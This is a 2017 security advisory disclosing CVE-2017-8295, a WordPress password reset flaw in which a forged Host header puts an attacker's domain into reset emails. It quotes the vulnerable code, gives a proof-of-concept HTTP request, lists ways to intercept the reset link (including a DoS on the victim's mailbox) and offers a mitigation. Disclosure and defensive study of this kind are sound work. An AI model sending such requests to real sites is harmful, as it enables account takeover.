WP 4.7.4 PR flaw

1.  
2.  
3. ====================================================
4. - Discovered by: Dawid Golunski (@dawid_golunski)
5. - dawid[at]legalhackers.com
6. - https://legalhackers.com
7. - ExploitBox.io (@Exploit_Box)
8.  
9.  
10. - CVE-2017-8295
11. - Release date: 03.05.2017
12. - Revision 1.0
13. - Severity: Medium/High
14. =============================================
15.  
16.  
17. I. VULNERABILITY
18. -------------------------
19.  
20. WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day)
21.  
22.  
23.  
24. II. BACKGROUND
25. -------------------------
26.  
27. "WordPress is a free and open-source content management system
28. (CMS) based on PHP and MySQL.
29.  
30. WordPress was used by more than 27.5% of the top 10 million
31. websites as of February 2017. WordPress is reportedly the
32. most popular website management or blogging system in
33. use on the Web, supporting more than 60 million websites."
34.  
35. https://en.wikipedia.org/wiki/WordPress
36.  
37.  
38. III. INTRODUCTION
39. -------------------------
40.  
41. Wordpress has a password reset feature that contains a vulnerability which
42. might in some cases allow attackers to get hold of the password reset link
43. without previous authentication.
44. Such attack could lead to an attacker gaining unauthorised access to a
45. victim's WordPress account.
46.  
47.  
48. IV. DESCRIPTION
49. -------------------------
50.  
51.  
52. The vulnerability stems from WordPress using untrusted data by default
53. when creating a password reset e-mail that is supposed to be delivered only
54. to the e-mail associated with the owner's account.
55.  
56. This can be observed in the following code snippet that creates a From
57. email header before calling a PHP mail() function:
58.  
59. ------[ wp-includes/pluggable.php ]------
60.  
61. ...
62.  
63. if ( !isset( $from_email ) ) {
64. // Get the site domain and get rid of www.
65. $sitename = strtolower( $_SERVER['SERVER_NAME'] );
66. if ( substr( $sitename, 0, 4 ) == 'www.' ) {
67. $sitename = substr( $sitename, 4 );
68. }
69.  
70. $from_email = 'wordpress@' . $sitename;
71. }
72.  
73. ...
74.  
75. -----------------------------------------
76.  
77. As we can see, Wordpress is using SERVER_NAME variable to get the hostname of
78. the server in order to create a From/Return-Path header of the outgoing password
79. reset email.
80. However, major web servers such as Apache by default set the SERVER_NAME variable
81. using the hostname supplied by the client (within the HTTP_HOST header):
82.  
83. https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
84.  
85.  
86. Because SERVER_NAME can be modified, an attacker could set it to an arbitrary
87. domain of his choice e.g:
88.  
89. attackers-mxserver.com
90.  
91. which would result in Wordpress setting the $from_email to
92.  
93. wordpress@attackers-mxserver.com
94.  
95. and thus result in an outgoing email with From/Return-Path set to this
96. malicious address.
97.  
98. As to which e-mail header the attacker would be able to modify - From or
99. Return-Path, it depends on the server environment. As can be read on
100. http://php.net/manual/en/function.mail.php
101. The From header sets also Return-Path under Windows.
102.  
103.  
104. Depending on the configuration of the mail server, it may result in
105. an email that gets sent to the victim WordPress user with
106. such malicious From/Return-Path address set in the email headers.
107.  
108.  
109. This could possibly allow the attacker to intercept the email containing the
110. password reset link in some cases requiring user interaction as well as without
111. user interaction.
112.  
113. Some example scenarios include:
114.  
115. * If attacker knows the email address of the victim user. They can perform a prior
116. DoS attack on the victim's email account (e.g by sending multiple
117. large files to exceed user's disk quota, or attacking the DNS server) in order to
118. cause the password reset email to be rejected by the receiving server, or not
119. reach the destination and thus get returned to the account on attacker's server
120.  
121. * Some autoresponders might attach a copy of the email sent in the body of the
122. auto-replied message
123.  
124. * Sending multiple password reset emails to force the user to reply to the
125. message to enquiry explanation for endless password reset emails.
126. The reply containing the password link would then be sent to attacker.
127.  
128. etc.
129.  
130.  
131. V. PROOF OF CONCEPT
132. -------------------------
133.  
134. If an attacker sends a request similar to the one below to a default Wordpress
135. installation that is accessible by the IP address (IP-based vhost):
136.  
137. -----[ HTTP Request ]----
138.  
139. POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
140. Host: injected-attackers-mxserver.com
141. Content-Type: application/x-www-form-urlencoded
142. Content-Length: 56
143.  
144. user_login=admin&redirect_to=&wp-submit=Get+New+Password
145.  
146. ------------------------
147.  
148.  
149. Wordpress will trigger the password reset function for the admin user account.
150.  
151. Because of the modified HOST header, the SERVER_NAME will be set to
152. the hostname of attacker's choice.
153. As a result, Wordpress will pass the following headers and email body to the
154. /usr/bin/sendmail wrapper:
155.  
156.  
157. ------[ resulting e-mail ]-----
158.  
159. Subject: [CompanyX WP] Password Reset
160. Return-Path: <wordpress@attackers-mxserver.com>
161. From: WordPress <wordpress@attackers-mxserver.com>
162. Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
163. X-Priority: 3
164. MIME-Version: 1.0
165. Content-Type: text/plain; charset=UTF-8
166. Content-Transfer-Encoding: 8bit
167.  
168. Someone requested that the password be reset for the following account:
169.  
170. http://companyX-wp/wp/wordpress/
171.  
172. Username: admin
173.  
174. If this was a mistake, just ignore this email and nothing will happen.
175.  
176. To reset your password, visit the following address:
177.  
178. <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
179.  
180. -------------------------------
181.  
182.  
183. As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
184. domain set.
185.  
186.  
187. The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
188. bash script of:
189.  
190. #!/bin/bash
191. cat > /tmp/outgoing-email
192.  
193.  
194.  
195. VI. BUSINESS IMPACT
196. -------------------------
197.  
198. Upon a successfull exploitation, attacker may be able to reset user's password
199. and gain unauthorized access to their WordPress account.
200.  
201.  
202. VII. SYSTEMS AFFECTED
203. -------------------------
204.  
205. All WordPress versions up to the latest 4.7.4
206.  
207.  
208. VIII. SOLUTION
209. -------------------------
210.  
211. No official solution available. As a temporary solution users can enable
212. UseCanonicalName to enforce static SERVER_NAME value
213.  
214. https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
215.  
216.  
217. This issue was first reported to WordPress security team multiple times,
218. with the first report sent in July 2016.
219.  
220. As there has been no progress in this case , this advisory is finally
221. released to the public without an official patch.
222.  
223.  
224.  
225. IX. REFERENCES
226. -------------------------
227.  
228. https://legalhackers.com
229.  
230. https://ExploitBox.io
231.  
232. Vendor site:
233. https://wordpress.org
234.  
235. http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
236.  
237. http://php.net/manual/en/function.mail.php
238.  
239. https://tools.ietf.org/html/rfc5321
240.  
241.  
242.  
243. X. CREDITS
244. -------------------------
245.  
246. Discovered by
247.  
248. Dawid Golunski
249. dawid (at) legalhackers (dot) com
250.  
251. https://legalhackers.com
252. https://ExploitBox.io
253.  
254.  
255.  
256. Thanks to BeyondSecurity for help with contacting the vendor.
257.  
258.  
259. XI. REVISION HISTORY
260. -------------------------
261.  
262. 03.05.2017 - Advisory released, rev. 1
263.  
264.  
265. XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS
266. -------------------------
267.  
268. ExploitBox.io is coming soon.
269. Subscribe at https://ExploitBox.io to stay updated and be there for the launch.
270.  
271.  
272. XIII. LEGAL NOTICES
273. -------------------------
274.  
275. The information contained within this advisory is supplied "as-is" with
276. no warranties or guarantees of fitness of use or otherwise. I accept no
277. responsibility for any damage caused by the use or misuse of this information.